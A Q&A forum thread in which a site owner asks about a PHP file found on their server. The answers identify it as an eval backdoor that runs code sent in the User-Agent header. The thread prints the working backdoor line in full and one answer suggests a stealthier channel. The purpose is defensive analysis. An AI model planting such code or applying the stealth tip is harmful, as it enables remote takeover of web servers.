A suspicious PHP file might

Question

I'm searching for your help today to get some help about a file I founded in my FTP this morning. I'm not a professionnal in all those PHP functions so this is why I post it here.

The thing I found was a file named index.php in a sub-images folder.

There is the raw code :

<?php

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { eval(str_replace('Mozilla/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }

?>

The two PHP functions

• eregi(); -> http://php.net/manual/en/function.eregi.php
• eval(); -> http://php.net/manual/en/function.eval.php

For the function eval() they are saying that it is very dangerous.

Caution The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. If you have carefully verified that there is no other option than to use this construct, pay special attention not to pass any user provided data into it without properly validating it beforehand.

This is why I think it might be an attempt from some one to hack my website or even more.

Any one has the capability to decode this and explain it to me?

Thx,

Answer 1

Let's start from the begining.

• eregi is a deprecated function as of PHP 5.3.0.
• eregi is a case insensitive regular expression.

So, what's it doing?

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) {

If final is in the HTTP_USER_AGENT, then....

Replace 'Mozilla/5.0 (3.1.final) ' with [blank] in the HTTP_USER_AGENT. And kill the script.

Conclusion

It's ineffective in terms of altering data on your site, but will render your site "dead" to anybody with the word final in their user agent - which, I think, will be all final version released of every major browser; although I cannot find any source on this.

Edit

The eval got me wondering. Since it's evident you didn't put it here, eval will evaluate code and execute it - which is a concern of an attack. The only way for somebody to get remote code to execute on your site is to "spoof" their user agent ensuring they have the phrase Mozilla/5.0 (3.1.final) in there followed by all the code they want executing. For example;

I spoof my user agent to become

Mozilla/5.0 (3.1.final)  echo 'Lol, you got hacked'

Because of the str_replace, the screen will just render the words Lol, you got hacked because eval will execute the echo. Of course, an attacker will put much more harmful commands to be evaluated. Remove this code immediately

Answer 2

Yes, it's a simple eval backdoor, installed so that someone can come back at any time later and use your server for anything nefarious that they want to.

It accepts a user agent string starting with Mozilla/5.0 (3.1.final) (which is not a real user agent string), and treats the rest of the string as PHP code, which is executed via the eval call.

(The strange part is that they used the user agent for this, since that field is routinely logged in standard web logs. Using a POST field or cookie would be much more covert.)